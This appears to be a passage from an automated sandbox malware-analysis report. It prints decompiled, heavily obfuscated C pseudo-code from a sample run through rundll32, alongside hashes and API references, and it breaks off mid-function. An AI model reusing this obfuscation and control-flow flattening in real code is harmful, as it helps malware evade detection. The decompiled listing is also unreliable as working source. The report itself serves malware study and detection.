                                                                                                                    • String ID:
                                                                                                                    • API String ID: 621844428-0
                                                                                                                    • Opcode ID: d0c754f3adca9a80957f35e1c78ce5c07ecf17b0c35f9d329434f55f6d35f6b1
                                                                                                                    • Instruction ID: 7407063ecc112861e3c8e1ddb3f03f449f46e8173bff9c2831c6dbce1decbdff
                                                                                                                    • Opcode Fuzzy Hash: d0c754f3adca9a80957f35e1c78ce5c07ecf17b0c35f9d329434f55f6d35f6b1
                                                                                                                    • Instruction Fuzzy Hash: E8F03C71901308FBEB04DBE8DA4699DFBF4EB50314F2081A9DA04B7261E7705F459B91
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 305 33b23c-33b2c6 call 3420b9 call 34aa30 lstrcmpiW
                                                                                                                    C-Code - Quality: 58%
                                                                                                                    			E0033B23C(intOrPtr __ecx, void* __edx, WCHAR* _a4, intOrPtr _a8, intOrPtr _a12, WCHAR* _a16) {
                                                                                                                    				signed int _v8;
                                                                                                                    				signed int _v12;
                                                                                                                    				void* _t27;
                                                                                                                    				int _t32;
                                                                                                                    
                                                                                                                    				_push(__ecx);
                                                                                                                    				_push(__ecx);
                                                                                                                    				_push(_a16);
                                                                                                                    				_push(_a12);
                                                                                                                    				_push(_a8);
                                                                                                                    				_push(_a4);
                                                                                                                    				_push(__ecx);
                                                                                                                    				E003420B9(_t27);
                                                                                                                    				_v12 = 0x6268;
                                                                                                                    				_v12 = _v12 ^ 0x57e834c3;
                                                                                                                    				_v12 = _v12 + 0xffff2919;
                                                                                                                    				_v12 = _v12 + 0xffff3e3d;
                                                                                                                    				_v12 = _v12 ^ 0x57e9dc2b;
                                                                                                                    				_v8 = 0xa46433;
                                                                                                                    				_v8 = _v8 + 0x98ba;
                                                                                                                    				_v8 = _v8 | 0xc390ebe9;
                                                                                                                    				_v8 = _v8 + 0xd5b0;
                                                                                                                    				_v8 = _v8 ^ 0xc3bab866;
                                                                                                                    				E0034AA30(0xb5, 0x9df7cc0d, __ecx, 0xaca78213);
                                                                                                                    				_t32 = lstrcmpiW(_a16, _a4); // executed
                                                                                                                    				return _t32;
                                                                                                                    			}








                                                                                                                    APIs
                                                                                                                    • lstrcmpiW.KERNELBASE(EE1E6DE5,57E9DC2B), ref: 0033B2C1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494709664.0000000000331000.00000020.00000800.00020000.00000000.sdmp, Offset: 00330000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494704127.0000000000330000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                    • Associated: 00000009.00000002.494732587.0000000000353000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_330000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: lstrcmpi
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1586166983-0
                                                                                                                    • Opcode ID: 26884a22f0da7bc497ec3f8ef604453e7fb46fa0b929fe200322ee9dcdc91410
                                                                                                                    • Instruction ID: 49d9bebc41868a22b3464def9f4896f55132f0d6ecda6bead3309295d397262c
                                                                                                                    • Opcode Fuzzy Hash: 26884a22f0da7bc497ec3f8ef604453e7fb46fa0b929fe200322ee9dcdc91410
                                                                                                                    • Instruction Fuzzy Hash: E40116B2C04608FFDF45DFD4DD468AEBFB5EB44304F208188B90566262E3729B60AB61
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    C-Code - Quality: 79%
                                                                                                                    			E0034E395(signed int __ecx, signed int* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr _a40, signed int _a44) {
                                                                                                                    				signed int _v4;
                                                                                                                    				signed int* _v8;
                                                                                                                    				signed int _v12;
                                                                                                                    				signed int _v16;
                                                                                                                    				signed int _v20;
                                                                                                                    				signed int _v24;
                                                                                                                    				signed int _v28;
                                                                                                                    				signed int _v32;
                                                                                                                    				signed int _v36;
                                                                                                                    				signed int _v40;
                                                                                                                    				signed int _v44;
                                                                                                                    				signed int _v48;
                                                                                                                    				signed int _v52;
                                                                                                                    				signed int _v56;
                                                                                                                    				signed int _v60;
                                                                                                                    				signed int _v64;
                                                                                                                    				signed int _v68;
                                                                                                                    				signed int _v72;
                                                                                                                    				signed int _v76;
                                                                                                                    				signed int _v80;
                                                                                                                    				signed int _v84;
                                                                                                                    				signed int _v88;
                                                                                                                    				signed int _v92;
                                                                                                                    				signed int _v96;
                                                                                                                    				signed int _v100;
                                                                                                                    				signed int _v104;
                                                                                                                    				signed int _v108;
                                                                                                                    				signed int _v112;
                                                                                                                    				signed int _v116;
                                                                                                                    				signed int _v120;
                                                                                                                    				signed int _v124;
                                                                                                                    				signed int _v128;
                                                                                                                    				signed int _v132;
                                                                                                                    				signed int _v136;
                                                                                                                    				signed int _v140;
                                                                                                                    				signed int _v144;
                                                                                                                    				signed int _v148;
                                                                                                                    				signed int _v152;
                                                                                                                    				signed int _v156;
                                                                                                                    				signed int _v160;
                                                                                                                    				signed int _v164;
                                                                                                                    				signed int _v168;
                                                                                                                    				signed int _v172;
                                                                                                                    				signed int _v176;
                                                                                                                    				signed int _v180;
                                                                                                                    				signed int _v184;
                                                                                                                    				signed int _v188;
                                                                                                                    				signed int _v192;
                                                                                                                    				signed int _v196;
                                                                                                                    				signed int _v200;
                                                                                                                    				signed int _v204;
                                                                                                                    				signed int _v208;
                                                                                                                    				signed int _v212;
                                                                                                                    				signed int _v216;
                                                                                                                    				signed int _v220;
                                                                                                                    				signed int _v224;
                                                                                                                    				signed int _v228;
                                                                                                                    				signed int _v232;
                                                                                                                    				signed int _v236;
                                                                                                                    				signed int _v240;
                                                                                                                    				signed int _v244;
                                                                                                                    				signed int _v248;
                                                                                                                    				signed int _v252;
                                                                                                                    				signed int _v256;
                                                                                                                    				signed int _v260;
                                                                                                                    				signed int _v264;
                                                                                                                    				signed int _v268;
                                                                                                                    				signed int _v272;
                                                                                                                    				intOrPtr _v276;
                                                                                                                    				signed int _v280;
                                                                                                                    				signed int _v284;
                                                                                                                    				signed int _v288;
                                                                                                                    				signed int _t823;
                                                                                                                    				void* _t829;
                                                                                                                    				signed int* _t832;
                                                                                                                    				signed int _t833;
                                                                                                                    				signed int _t845;
                                                                                                                    				signed int _t858;
                                                                                                                    				signed int _t862;
                                                                                                                    				intOrPtr _t868;
                                                                                                                    				signed int _t888;
                                                                                                                    				void* _t939;
                                                                                                                    				void* _t948;
                                                                                                                    				signed int _t956;
                                                                                                                    				signed int _t957;
                                                                                                                    				signed int _t958;
                                                                                                                    				signed int _t959;
                                                                                                                    				signed int _t960;
                                                                                                                    				signed int _t961;
                                                                                                                    				signed int _t962;
                                                                                                                    				signed int _t963;
                                                                                                                    				signed int _t964;
                                                                                                                    				signed int _t965;
                                                                                                                    				signed int _t966;
                                                                                                                    				signed int _t967;
                                                                                                                    				signed int _t968;
                                                                                                                    				signed int _t969;
                                                                                                                    				signed int _t970;
                                                                                                                    				signed int _t971;
                                                                                                                    				signed int _t972;
                                                                                                                    				signed int _t973;
                                                                                                                    				signed int _t974;
                                                                                                                    				signed int _t975;
                                                                                                                    				signed int _t976;
                                                                                                                    				signed int _t977;
                                                                                                                    				signed int _t981;
                                                                                                                    				signed int _t984;
                                                                                                                    				signed int _t985;
                                                                                                                    				signed int* _t988;
                                                                                                                    				void* _t991;
                                                                                                                    
                                                                                                                    				_push(_a44);
                                                                                                                    				_v4 = __ecx;
                                                                                                                    				_push(_a40);
                                                                                                                    				_v8 = __edx;
                                                                                                                    				_push(_a36);
                                                                                                                    				_push(_a32);
                                                                                                                    				_push(_a28);
                                                                                                                    				_push(_a24);
                                                                                                                    				_push(_a20);
                                                                                                                    				_push(_a16);
                                                                                                                    				_push(_a12);
                                                                                                                    				_push(_a8);
                                                                                                                    				_push(_a4);
                                                                                                                    				_push(__edx);
                                                                                                                    				_push(__ecx & 0x0000ffff);
                                                                                                                    				E003420B9(__ecx & 0x0000ffff);
                                                                                                                    				_v284 = 0x99c43c;
                                                                                                                    				_t988 =  &(( &_v288)[0xd]);
                                                                                                                    				_v284 = _v284 + 0xbb14;
                                                                                                                    				_v284 = _v284 >> 0xb;
                                                                                                                    				_v284 = _v284 ^ 0x0000134f;
                                                                                                                    				_t862 = 0;
                                                                                                                    				_v120 = 0x27310;
                                                                                                                    				_t977 = 0x329d839;
                                                                                                                    				_t956 = 0x43;
                                                                                                                    				_v120 = _v120 / _t956;
                                                                                                                    				_v120 = _v120 + 0xe2f5;
                                                                                                                    				_v120 = _v120 ^ 0x0000ec43;
                                                                                                                    				_v36 = 0x50046c;
                                                                                                                    				_v36 = _v36 << 1;
                                                                                                                    				_v36 = _v36 ^ 0x00a00810;
                                                                                                                    				_v116 = 0x7f268a;
                                                                                                                    				_v116 = _v116 ^ 0x5f915552;
                                                                                                                    				_t957 = 0x1b;
                                                                                                                    				_v276 = 0;
                                                                                                                    				_v116 = _v116 * 0x3e;
                                                                                                                    				_v116 = _v116 ^ 0x3bc08e50;
                                                                                                                    				_v228 = 0xb299e8;
                                                                                                                    				_v228 = _v228 >> 0xe;
                                                                                                                    				_v228 = _v228 << 0x10;
                                                                                                                    				_v228 = _v228 * 0x42;
                                                                                                                    				_v228 = _v228 ^ 0xb8144000;
                                                                                                                    				_v64 = 0x620921;
                                                                                                                    				_v64 = _v64 | 0xbe88b167;
                                                                                                                    				_v64 = _v64 ^ 0xbeaab967;
                                                                                                                    				_v172 = 0xae09b0;
                                                                                                                    				_v172 = _v172 | 0xde677f7d;
                                                                                                                    				_v172 = _v172 ^ 0xc5d04777;
                                                                                                                    				_v172 = _v172 ^ 0x1b3b388a;
                                                                                                                    				_v132 = 0xc06abb;
                                                                                                                    				_v132 = _v132 ^ 0x2b7b17d1;
                                                                                                                    				_v132 = _v132 / _t957;
                                                                                                                    				_v132 = _v132 ^ 0x059ea5d4;
                                                                                                                    				_v236 = 0x9fdac6;
                                                                                                                    				_v236 = _v236 >> 4;
                                                                                                                    				_v236 = _v236 + 0x9b65;
                                                                                                                    				_v236 = _v236 * 0x7b;
                                                                                                                    				_v236 = _v236 ^ 0x051f8b2b;
                                                                                                                    				_v108 = 0xc74878;
                                                                                                                    				_v108 = _v108 + 0x314b;
                                                                                                                    				_v108 = _v108 * 0x41;
                                                                                                                    				_v108 = _v108 ^ 0x32a5e883;
                                                                                                                    				_v196 = 0x1587ec;
                                                                                                                    				_v196 = _v196 ^ 0x07496474;
                                                                                                                    				_v196 = _v196 >> 7;
                                                                                                                    				_t958 = 0x2c;
                                                                                                                    				_v196 = _v196 / _t958;
                                                                                                                    				_v196 = _v196 ^ 0x000054ad;
                                                                                                                    				_v244 = 0xbebf62;
                                                                                                                    				_v244 = _v244 << 0xb;
                                                                                                                    				_v244 = _v244 + 0xffffca16;
                                                                                                                    				_v244 = _v244 << 0xe;
                                                                                                                    				_v244 = _v244 ^ 0x36858000;
                                                                                                                    				_v72 = 0x750de5;
                                                                                                                    				_v72 = _v72 | 0xb336b270;
                                                                                                                    				_v72 = _v72 ^ 0xb377bff5;
                                                                                                                    				_v256 = 0xc175fb;
                                                                                                                    				_t984 = 0x72;
                                                                                                                    				_t959 = 0x28;
                                                                                                                    				_v256 = _v256 * 0x26;
                                                                                                                    				_v256 = _v256 >> 5;
                                                                                                                    				_v256 = _v256 ^ 0xfb5a89da;
                                                                                                                    				_v256 = _v256 ^ 0xfbbf3581;
                                                                                                                    				_v76 = 0x1a7820;
                                                                                                                    				_v76 = _v76 | 0xb8d3f172;
                                                                                                                    				_v76 = _v76 ^ 0xb8dbf96d;
                                                                                                                    				_v224 = 0x97ff87;
                                                                                                                    				_v224 = _v224 / _t984;
                                                                                                                    				_v224 = _v224 >> 6;
                                                                                                                    				_v224 = _v224 * 0x5d;
                                                                                                                    				_v224 = _v224 ^ 0x0001effe;
                                                                                                                    				_v40 = 0x7c0450;
                                                                                                                    				_v40 = _v40 / _t959;
                                                                                                                    				_v40 = _v40 ^ 0x000319b6;
                                                                                                                    				_v136 = 0x260fad;
                                                                                                                    				_v136 = _v136 + 0x622a;
                                                                                                                    				_t960 = 0x1c;
                                                                                                                    				_v136 = _v136 / _t960;
                                                                                                                    				_v136 = _v136 ^ 0x00015e7e;
                                                                                                                    				_v288 = 0x61f743;
                                                                                                                    				_t961 = 0x66;
                                                                                                                    				_v288 = _v288 * 0x25;
                                                                                                                    				_v288 = _v288 ^ 0x0e2ee817;
                                                                                                                    				_v288 = 0x858eca;
                                                                                                                    				_v288 = _v288 / _t984;
                                                                                                                    				_v288 = _v288 ^ 0x0002de1a;
                                                                                                                    				_v280 = 0xcba1b8;
                                                                                                                    				_v280 = _v280 / _t961;
                                                                                                                    				_v280 = _v280 ^ 0xc2211053;
                                                                                                                    				_v280 = _v280 + 0xffff75b7;
                                                                                                                    				_v280 = _v280 ^ 0xc2279606;
                                                                                                                    				_v288 = 0x614b46;
                                                                                                                    				_v288 = _v288 >> 4;
                                                                                                                    				_v288 = _v288 ^ 0x000cf9c3;
                                                                                                                    				_v288 = 0x794624;
                                                                                                                    				_v288 = _v288 + 0xb4d0;
                                                                                                                    				_v288 = _v288 ^ 0x0072cd5b;
                                                                                                                    				_v288 = 0xcdbe83;
                                                                                                                    				_v288 = _v288 >> 0xf;
                                                                                                                    				_v288 = _v288 ^ 0x00034ad6;
                                                                                                                    				_v288 = 0x24639d;
                                                                                                                    				_t962 = 0x28;
                                                                                                                    				_v288 = _v288 / _t962;
                                                                                                                    				_v288 = _v288 ^ 0x000e4507;
                                                                                                                    				_v288 = 0x4730ec;
                                                                                                                    				_t963 = 0x21;
                                                                                                                    				_v288 = _v288 / _t963;
                                                                                                                    				_v288 = _v288 ^ 0x0002fb4b;
                                                                                                                    				_v284 = 0xb301d9;
                                                                                                                    				_t964 = 0x4e;
                                                                                                                    				_v284 = _v284 / _t964;
                                                                                                                    				_v284 = _v284 + 0x8c1d;
                                                                                                                    				_v284 = _v284 ^ 0x00061f34;
                                                                                                                    				_v280 = 0xfdcbf7;
                                                                                                                    				_v280 = _v280 + 0x27a;
                                                                                                                    				_v280 = _v280 + 0xffff891b;
                                                                                                                    				_t965 = 0x46;
                                                                                                                    				_v280 = _v280 / _t965;
                                                                                                                    				_v280 = _v280 ^ 0x0008575c;
                                                                                                                    				_v284 = 0xc1d3a0;
                                                                                                                    				_v284 = _v284 >> 0xc;
                                                                                                                    				_v284 = _v284 << 2;
                                                                                                                    				_v284 = _v284 ^ 0x000b0f76;
                                                                                                                    				_v112 = 0xeee25;
                                                                                                                    				_v112 = _v112 << 0xc;
                                                                                                                    				_v112 = _v112 << 4;
                                                                                                                    				_v112 = _v112 ^ 0xee2c14e7;
                                                                                                                    				_v180 = 0x8a49b3;
                                                                                                                    				_v180 = _v180 | 0xb0d6dc69;
                                                                                                                    				_v180 = _v180 + 0xffffa02a;
                                                                                                                    				_v180 = _v180 | 0x7fd27f38;
                                                                                                                    				_v180 = _v180 ^ 0xffd81443;
                                                                                                                    				_v152 = 0x628374;
                                                                                                                    				_v152 = _v152 >> 2;
                                                                                                                    				_v152 = _v152 + 0xffff73d9;
                                                                                                                    				_t966 = 0x2e;
                                                                                                                    				_v152 = _v152 / _t966;
                                                                                                                    				_v152 = _v152 ^ 0x0001ef4a;
                                                                                                                    				_v28 = 0xe4a1af;
                                                                                                                    				_v28 = _v28 + 0x32bc;
                                                                                                                    				_v28 = _v28 ^ 0x00ec33da;
                                                                                                                    				_v160 = 0x595a50;
                                                                                                                    				_v160 = _v160 + 0xffffdbfa;
                                                                                                                    				_v160 = _v160 + 0xffffb344;
                                                                                                                    				_t967 = 0x36;
                                                                                                                    				_v160 = _v160 / _t967;
                                                                                                                    				_v160 = _v160 ^ 0x0006861f;
                                                                                                                    				_v88 = 0x4d7ad3;
                                                                                                                    				_v88 = _v88 + 0xc28a;
                                                                                                                    				_v88 = _v88 ^ 0x004ca34c;
                                                                                                                    				_v48 = 0xf1782b;
                                                                                                                    				_v48 = _v48 ^ 0xe8a77c51;
                                                                                                                    				_v48 = _v48 ^ 0xe85593aa;
                                                                                                                    				_v100 = 0x42ea8e;
                                                                                                                    				_t985 = 0x2a;
                                                                                                                    				_v100 = _v100 / _t985;
                                                                                                                    				_v100 = _v100 ^ 0x000caa85;
                                                                                                                    				_v148 = 0xa48e68;
                                                                                                                    				_t968 = 6;
                                                                                                                    				_v148 = _v148 / _t968;
                                                                                                                    				_v148 = _v148 << 0xc;
                                                                                                                    				_v148 = _v148 ^ 0xb6d58e9e;
                                                                                                                    				_v252 = 0x4ff2e7;
                                                                                                                    				_t969 = 0xc;
                                                                                                                    				_v252 = _v252 / _t969;
                                                                                                                    				_v252 = _v252 << 6;
                                                                                                                    				_v252 = _v252 << 0xc;
                                                                                                                    				_v252 = _v252 ^ 0xa6466867;
                                                                                                                    				_v80 = 0x4d7637;
                                                                                                                    				_v80 = _v80 + 0xd199;
                                                                                                                    				_v80 = _v80 ^ 0x004dfa45;
                                                                                                                    				_v24 = 0xfee4b3;
                                                                                                                    				_t970 = 0x3e;
                                                                                                                    				_v24 = _v24 * 0x23;
                                                                                                                    				_v24 = _v24 ^ 0x22d37c34;
                                                                                                                    				_v204 = 0x24209;
                                                                                                                    				_v204 = _v204 + 0xffffcebc;
                                                                                                                    				_v204 = _v204 ^ 0x847f2e61;
                                                                                                                    				_v204 = _v204 + 0xffff5302;
                                                                                                                    				_v204 = _v204 ^ 0x847f4f7c;
                                                                                                                    				_v260 = 0x4a587;
                                                                                                                    				_v260 = _v260 * 0x4a;
                                                                                                                    				_v260 = _v260 + 0xffff9bf3;
                                                                                                                    				_v260 = _v260 + 0xffff92e5;
                                                                                                                    				_v260 = _v260 ^ 0x015b504d;
                                                                                                                    				_v164 = 0x6d05db;
                                                                                                                    				_v164 = _v164 * 0x14;
                                                                                                                    				_v164 = _v164 >> 4;
                                                                                                                    				_v164 = _v164 ^ 0x556abaa4;
                                                                                                                    				_v164 = _v164 ^ 0x55e01079;
                                                                                                                    				_v20 = 0x80cc5b;
                                                                                                                    				_v20 = _v20 >> 0xd;
                                                                                                                    				_v20 = _v20 ^ 0x000efc86;
                                                                                                                    				_v104 = 0xc8e6e2;
                                                                                                                    				_v104 = _v104 << 8;
                                                                                                                    				_v104 = _v104 >> 0x10;
                                                                                                                    				_v104 = _v104 ^ 0x000afff3;
                                                                                                                    				_v272 = 0x560e69;
                                                                                                                    				_v272 = _v272 + 0x2793;
                                                                                                                    				_v272 = _v272 * 0xe;
                                                                                                                    				_v272 = _v272 + 0xc902;
                                                                                                                    				_v272 = _v272 ^ 0x04bc6edc;
                                                                                                                    				_v16 = 0xfcaf67;
                                                                                                                    				_v16 = _v16 / _t970;
                                                                                                                    				_v16 = _v16 ^ 0x000c0ba9;
                                                                                                                    				_v56 = 0x81a14f;
                                                                                                                    				_v56 = _v56 >> 0xb;
                                                                                                                    				_v56 = _v56 ^ 0x000fb9cd;
                                                                                                                    				_v32 = 0x24333c;
                                                                                                                    				_v32 = _v32 / _t985;
                                                                                                                    				_v32 = _v32 ^ 0x00065bee;
                                                                                                                    				_v124 = 0xe3a445;
                                                                                                                    				_v124 = _v124 >> 5;
                                                                                                                    				_v124 = _v124 >> 7;
                                                                                                                    				_v124 = _v124 ^ 0x0000dfdf;
                                                                                                                    				_v220 = 0x5f21d9;
                                                                                                                    				_t971 = 0x79;
                                                                                                                    				_v220 = _v220 * 0x54;
                                                                                                                    				_v220 = _v220 << 5;
                                                                                                                    				_v220 = _v220 ^ 0x0e372a7b;
                                                                                                                    				_v220 = _v220 ^ 0xe8dc9c41;
                                                                                                                    				_v188 = 0xc44d01;
                                                                                                                    				_v188 = _v188 ^ 0x0373dd04;
                                                                                                                    				_v188 = _v188 * 0x30;
                                                                                                                    				_v188 = _v188 ^ 0xfb03bbf0;
                                                                                                                    				_v188 = _v188 ^ 0x496460ca;
                                                                                                                    				_v268 = 0x8213af;
                                                                                                                    				_v268 = _v268 ^ 0x6d9501b2;
                                                                                                                    				_v268 = _v268 | 0x4d165578;
                                                                                                                    				_v268 = _v268 >> 4;
                                                                                                                    				_v268 = _v268 ^ 0x06d55fab;
                                                                                                                    				_v212 = 0x705526;
                                                                                                                    				_v212 = _v212 >> 0xa;
                                                                                                                    				_v212 = _v212 << 9;
                                                                                                                    				_v212 = _v212 >> 8;
                                                                                                                    				_v212 = _v212 ^ 0x000b72c4;
                                                                                                                    				_v92 = 0xc8093b;
                                                                                                                    				_v92 = _v92 + 0xd043;
                                                                                                                    				_v92 = _v92 ^ 0x00ca3bde;
                                                                                                                    				_v264 = 0x1f9619;
                                                                                                                    				_v264 = _v264 + 0xffffbc34;
                                                                                                                    				_v264 = _v264 * 0x3e;
                                                                                                                    				_v264 = _v264 * 0x52;
                                                                                                                    				_v264 = _v264 ^ 0x6e0edc82;
                                                                                                                    				_v96 = 0x6d9960;
                                                                                                                    				_v96 = _v96 | 0x9fb7a8f9;
                                                                                                                    				_v96 = _v96 ^ 0x9ff35e32;
                                                                                                                    				_v144 = 0x447df2;
                                                                                                                    				_v144 = _v144 << 8;
                                                                                                                    				_v144 = _v144 + 0xffff6cb2;
                                                                                                                    				_v144 = _v144 ^ 0x44714589;
                                                                                                                    				_v240 = 0x65db08;
                                                                                                                    				_v240 = _v240 * 6;
                                                                                                                    				_v240 = _v240 + 0x5f97;
                                                                                                                    				_v240 = _v240 >> 0xd;
                                                                                                                    				_v240 = _v240 ^ 0x000293b4;
                                                                                                                    				_v84 = 0x3c7c20;
                                                                                                                    				_v84 = _v84 ^ 0x2c3d49c2;
                                                                                                                    				_v84 = _v84 ^ 0x2c080053;
                                                                                                                    				_v248 = 0x13c85;
                                                                                                                    				_v248 = _v248 + 0x8cd8;
                                                                                                                    				_v248 = _v248 + 0x6e3d;
                                                                                                                    				_v248 = _v248 ^ 0xe59eace5;
                                                                                                                    				_v248 = _v248 ^ 0xe5984999;
                                                                                                                    				_v216 = 0x6164ef;
                                                                                                                    				_v216 = _v216 << 6;
                                                                                                                    				_v216 = _v216 + 0xffff2edc;
                                                                                                                    				_v216 = _v216 | 0xa66c888f;
                                                                                                                    				_v216 = _v216 ^ 0xbe7947d5;
                                                                                                                    				_v232 = 0x991e82;
                                                                                                                    				_v232 = _v232 + 0xffff48fb;
                                                                                                                    				_v232 = _v232 >> 0xe;
                                                                                                                    				_v232 = _v232 | 0x69e4ac2c;
                                                                                                                    				_v232 = _v232 ^ 0x69ef7d1b;
                                                                                                                    				_v68 = 0x9d94b2;
                                                                                                                    				_v68 = _v68 | 0xcead792c;
                                                                                                                    				_v68 = _v68 ^ 0xceb9e800;
                                                                                                                    				_v44 = 0x20071e;
                                                                                                                    				_v44 = _v44 / _t971;
                                                                                                                    				_v44 = _v44 ^ 0x000a654c;
                                                                                                                    				_v128 = 0x223cb7;
                                                                                                                    				_v128 = _v128 + 0x9bf0;
                                                                                                                    				_v128 = _v128 | 0x79b7d361;
                                                                                                                    				_v128 = _v128 ^ 0x79b3b147;
                                                                                                                    				_v52 = 0x8ed203;
                                                                                                                    				_v52 = _v52 + 0xffff1a7b;
                                                                                                                    				_v52 = _v52 ^ 0x008be8c4;
                                                                                                                    				_v208 = 0xe0ac17;
                                                                                                                    				_v208 = _v208 ^ 0xbcfe8cf2;
                                                                                                                    				_t972 = 0x6b;
                                                                                                                    				_v208 = _v208 / _t972;
                                                                                                                    				_v208 = _v208 | 0x3ee9ec5f;
                                                                                                                    				_v208 = _v208 ^ 0x3fec9c1d;
                                                                                                                    				_v192 = 0x219bfa;
                                                                                                                    				_v192 = _v192 >> 4;
                                                                                                                    				_v192 = _v192 + 0x77e4;
                                                                                                                    				_v192 = _v192 | 0x2fb4141c;
                                                                                                                    				_v192 = _v192 ^ 0x2fb2076e;
                                                                                                                    				_v200 = 0x8926e2;
                                                                                                                    				_v200 = _v200 << 4;
                                                                                                                    				_t973 = 0xc;
                                                                                                                    				_v200 = _v200 / _t973;
                                                                                                                    				_v200 = _v200 + 0xffff5704;
                                                                                                                    				_v200 = _v200 ^ 0x00bbfbcc;
                                                                                                                    				_v284 = 0xaed0cb;
                                                                                                                    				_v284 = _v284 + 0x9c17;
                                                                                                                    				_v284 = _v284 + 0xaf6d;
                                                                                                                    				_v284 = _v284 ^ 0x00b89bc1;
                                                                                                                    				_v168 = 0x914ce9;
                                                                                                                    				_v168 = _v168 | 0xceb3d4af;
                                                                                                                    				_v168 = _v168 ^ 0x5adaba1c;
                                                                                                                    				_v168 = _v168 ^ 0x3c292fbf;
                                                                                                                    				_v168 = _v168 ^ 0xa84ea968;
                                                                                                                    				_v156 = 0x90c891;
                                                                                                                    				_v156 = _v156 + 0xffff3667;
                                                                                                                    				_t974 = 0x5c;
                                                                                                                    				_v156 = _v156 / _t974;
                                                                                                                    				_t975 = 0x3c;
                                                                                                                    				_v156 = _v156 / _t975;
                                                                                                                    				_v156 = _v156 ^ 0x000da682;
                                                                                                                    				_v140 = 0xffcb83;
                                                                                                                    				_v140 = _v140 << 0xd;
                                                                                                                    				_v140 = _v140 | 0xcebab625;
                                                                                                                    				_v140 = _v140 ^ 0xfff71570;
                                                                                                                    				_v280 = 0xfef1ee;
                                                                                                                    				_v280 = _v280 >> 8;
                                                                                                                    				_v280 = _v280 + 0xffff306e;
                                                                                                                    				_v280 = _v280 | 0x3331510b;
                                                                                                                    				_v280 = _v280 ^ 0x3338227a;
                                                                                                                    				_v176 = 0xc7331d;
                                                                                                                    				_v176 = _v176 >> 7;
                                                                                                                    				_v176 = _v176 + 0x1d50;
                                                                                                                    				_v176 = _v176 << 5;
                                                                                                                    				_v176 = _v176 ^ 0x00370898;
                                                                                                                    				_v288 = 0x519041;
                                                                                                                    				_v288 = _v288 + 0x7cd9;
                                                                                                                    				_v288 = _v288 ^ 0x0057f5a9;
                                                                                                                    				_t976 = _v12;
                                                                                                                    				_t986 = _v12;
                                                                                                                    				while(1) {
                                                                                                                    					L1:
                                                                                                                    					_t939 = 0x68a9e90;
                                                                                                                    					while(1) {
                                                                                                                    						_t823 = _v184;
                                                                                                                    						while(1) {
                                                                                                                    							L3:
                                                                                                                    							_t991 = _t977 - _t939;
                                                                                                                    							if(_t991 > 0) {
                                                                                                                    								break;
                                                                                                                    							}
                                                                                                                    							if(_t991 == 0) {
                                                                                                                    								__eflags =  *_v8;
                                                                                                                    								if(__eflags != 0) {
                                                                                                                    									_push(_v104);
                                                                                                                    									_push(_v20);
                                                                                                                    									_t868 = E0034DCF7(_v164, 0x331524, __eflags);
                                                                                                                    									_v276 = _t868;
                                                                                                                    								}
                                                                                                                    								_t845 = _v244 | _v196 | _v108 | _v236 | _v132 | _v172 | _v64 | _v228 | _v116;
                                                                                                                    								_t981 = _a44 & 1;
                                                                                                                    								__eflags = _t981;
                                                                                                                    								if(_t981 != 0) {
                                                                                                                    									__eflags = _t845;
                                                                                                                    								}
                                                                                                                    								_push(_t868);
                                                                                                                    								_t976 = E003375FA(_t868, _t845, _v272, _t868, _v16, _a16, _v56, _v32, _v124, _t868, _v220, _v188, _v184);
                                                                                                                    								E0033A8B0(_v268, _v276, _v212);
                                                                                                                    								_t988 =  &(_t988[0xe]);
                                                                                                                    								__eflags = _t976;
                                                                                                                    								if(_t976 == 0) {
                                                                                                                    									_t977 = 0x51daea9;
                                                                                                                    								} else {
                                                                                                                    									_push(_v96);
                                                                                                                    									_push(_v264);
                                                                                                                    									_push(_v256);
                                                                                                                    									_v60 = 1;
                                                                                                                    									_push( &_v60);
						_push(_v92);
						_t948 = 4;
						E00339670(_t976, _t948);
						_t988 =  &(_t988[5]);
						__eflags = _t981;
						if(_t981 != 0) {
							E0034408E( &_v12, _v76, _v144, _v240, _t976,  &_v60, _v84, _v248);
							_t732 =  &_v60;
							 *_t732 = _v60 | _v136;
							__eflags =  *_t732;
							E00339670(_t976, _v12, _v216,  &_v60, _v224, _v232, _v68);
							_t988 =  &(_t988[0xb]);
						}
						_t977 = 0xbee37f5;
					}
					L11:
					_t868 = _v276;
					goto L1;
				}
				if(_t977 == 0x2602436) {
					_t977 = 0x506ebc3;
					continue;
				}
				if(_t977 == 0x329d839) {
					_t977 = 0x2602436;
					continue;
				}
				if(_t977 == 0x4bb42fe) {
					_t823 = E003388C3(_v100, _v148, _v40, _t868, _t868, _t986, _v252, _v80, _a36, _v24, _t868, _v4, _t868, _v204, _v260);
					_t868 = _v276;
					_t988 =  &(_t988[0xd]);
					__eflags = _t823;
					_v184 = _t823;
					_t939 = 0x68a9e90;
					_t977 =  !=  ? 0x68a9e90 : 0x9a35046;
					continue;
				}
				if(_t977 == 0x506ebc3) {
					_push(_t868);
					_push(_v72);
					_push(_v160);
					_push(_v28);
					_push(_v152);
					_t858 = E0034DAC6(_v112, _v180);
					_t986 = _t858;
					__eflags = _t858;
					_t977 =  !=  ? 0x4bb42fe : 0xdf8c541;
					E00348519(_v88, _v48, 0);
					_t988 = _t988 - 0xc + 0x24;
					L37:
					_t868 = _v276;
					_t939 = 0x68a9e90;
					L38:
					__eflags = _t977 - 0xdf8c541;
					if(_t977 == 0xdf8c541) {
						L41:
						return _t862;
					}
					_t823 = _v184;
					continue;
				}
				if(_t977 != 0x51daea9) {
					goto L38;
				}
				E00332B62(_v168, _t823, _v156, _v140);
				_t977 = 0x9a35046;
				goto L11;
			}
			__eflags = _t977 - 0x81a6b17;
			if(_t977 == 0x81a6b17) {
				E00332B62(_v192, _t976, _v200, _v284);
